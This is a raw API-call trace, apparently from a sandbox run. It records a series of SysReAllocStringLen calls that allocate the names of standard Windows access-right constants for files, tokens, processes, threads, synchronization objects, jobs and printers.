[0149.808] SysReAllocStringLen (in: pbstr=0x2a3ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2a3ebc0*="FILE_READ_DATA") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2a3ebb0*="FILE_ALL_ACCESS") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3eb80*="STANDARD_RIGHTS_READ") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3eb70*="STANDARD_RIGHTS_ALL") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3eb50*="DELETE") returned 1
[0149.808] SysReAllocStringLen (in: pbstr=0x2a3eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3eb40*="READ_CONTROL") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3eb30*="WRITE_OWNER") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3eb20*="WRITE_DAC") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2a3eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2a3eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2a3eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2a3eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2a3ead0*="TOKEN_QUERY_SOURCE") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2a3eac0*="TOKEN_QUERY") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2a3eab0*="TOKEN_IMPERSONATE") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2a3eaa0*="TOKEN_DUPLICATE") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2a3ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3ea80*="TOKEN_ALL_ACCESS") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3ea50*="STANDARD_RIGHTS_READ") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3ea40*="STANDARD_RIGHTS_ALL") returned 1
[0149.809] SysReAllocStringLen (in: pbstr=0x2a3ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3ea30*="DELETE") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ea20*="READ_CONTROL") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3ea10*="WRITE_OWNER") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ea00*="WRITE_DAC") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e9f0*="TIMER_MODIFY_STATE") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2a3e9e0*="TIMER_QUERY_STATE") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e9d0*="TIMER_ALL_ACCESS") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e9a0*="STANDARD_RIGHTS_READ") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e990*="STANDARD_RIGHTS_ALL") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e980*="DELETE") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e970*="READ_CONTROL") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e960*="WRITE_OWNER") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e950*="WRITE_DAC") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2a3e940*="SECTION_EXTEND_SIZE") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2a3e930*="FILE_MAP_READ") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2a3e920*="FILE_MAP_WRITE") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2a3e910*="FILE_MAP_COPY") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2a3e900*="FILE_MAP_ALL_ACCESS") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.810] SysReAllocStringLen (in: pbstr=0x2a3e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e8d0*="STANDARD_RIGHTS_READ") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e8b0*="DELETE") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e8a0*="READ_CONTROL") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e890*="WRITE_OWNER") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e880*="WRITE_DAC") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e870*="MUTEX_MODIFY_STATE") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e860*="MUTEX_ALL_ACCESS") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e840*="STANDARD_RIGHTS_WRITE") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e830*="STANDARD_RIGHTS_READ") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e820*="STANDARD_RIGHTS_ALL") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e810*="DELETE") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e800*="READ_CONTROL") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e7f0*="WRITE_OWNER") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e7e0*="WRITE_DAC") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2a3e7d0*="EVENT_MODIFY_STATE") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2a3e7c0*="EVENT_ALL_ACCESS") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0149.811] SysReAllocStringLen (in: pbstr=0x2a3e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e790*="STANDARD_RIGHTS_READ") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e780*="STANDARD_RIGHTS_ALL") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e770*="DELETE") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e760*="READ_CONTROL") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e750*="WRITE_OWNER") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e740*="WRITE_DAC") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2a3e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2a3e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e700*="STANDARD_RIGHTS_WRITE") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e6f0*="STANDARD_RIGHTS_READ") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e6d0*="DELETE") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e6c0*="READ_CONTROL") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e6b0*="WRITE_OWNER") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e6a0*="WRITE_DAC") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2a3e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2a3e680*="JOB_OBJECT_TERMINATE") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2a3e670*="JOB_OBJECT_QUERY") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2a3e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2a3e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2a3e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0149.812] SysReAllocStringLen (in: pbstr=0x2a3e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e620*="STANDARD_RIGHTS_WRITE") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e610*="STANDARD_RIGHTS_READ") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e600*="STANDARD_RIGHTS_ALL") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e5f0*="DELETE") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e5e0*="READ_CONTROL") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e5d0*="WRITE_OWNER") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e5c0*="WRITE_DAC") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2a3e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2a3e5a0*="THREAD_IMPERSONATE") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2a3e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2a3e580*="THREAD_QUERY_INFORMATION") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2a3e570*="THREAD_SET_INFORMATION") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2a3e560*="THREAD_SET_CONTEXT") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2a3e550*="THREAD_GET_CONTEXT") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2a3e540*="THREAD_SUSPEND_RESUME") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2a3e530*="THREAD_TERMINATE") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2a3e520*="THREAD_ALL_ACCESS") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e500*="STANDARD_RIGHTS_WRITE") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e4f0*="STANDARD_RIGHTS_READ") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e4d0*="DELETE") returned 1
[0149.813] SysReAllocStringLen (in: pbstr=0x2a3e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e4c0*="READ_CONTROL") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e4b0*="WRITE_OWNER") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e4a0*="WRITE_DAC") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2a3e490*="PROCESS_QUERY_INFORMATION") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2a3e480*="PROCESS_SET_INFORMATION") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2a3e470*="PROCESS_SET_QUOTA") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2a3e460*="PROCESS_CREATE_PROCESS") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2a3e450*="PROCESS_DUP_HANDLE") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2a3e440*="PROCESS_VM_WRITE") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2a3e430*="PROCESS_VM_READ") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2a3e420*="PROCESS_VM_OPERATION") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2a3e410*="PROCESS_SET_SESSIONID") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2a3e400*="PROCESS_CREATE_THREAD") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2a3e3f0*="PROCESS_TERMINATE") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e3e0*="PROCESS_ALL_ACCESS") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e3b0*="STANDARD_RIGHTS_READ") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e390*="DELETE") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e380*="READ_CONTROL") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e370*="WRITE_OWNER") returned 1
[0149.814] SysReAllocStringLen (in: pbstr=0x2a3e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e360*="WRITE_DAC") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2a3e350*="PERM_FILE_CREATE") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2a3e340*="PERM_FILE_WRITE") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2a3e330*="PERM_FILE_READ") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e310*="STANDARD_RIGHTS_WRITE") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e300*="STANDARD_RIGHTS_READ") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e2e0*="DELETE") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e2d0*="READ_CONTROL") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e2c0*="WRITE_OWNER") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e2b0*="WRITE_DAC") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2a3e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2a3e290*="PRINTER_ACCESS_USE") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2a3e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2a3e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2a3e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e250*="PRINTER_ALL_ACCESS") returned 1
[0149.815] SysReAllocStringLen (in: pbstr=0x2a3e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2a3e240*="PRINTER_EXECUTE") returned 1
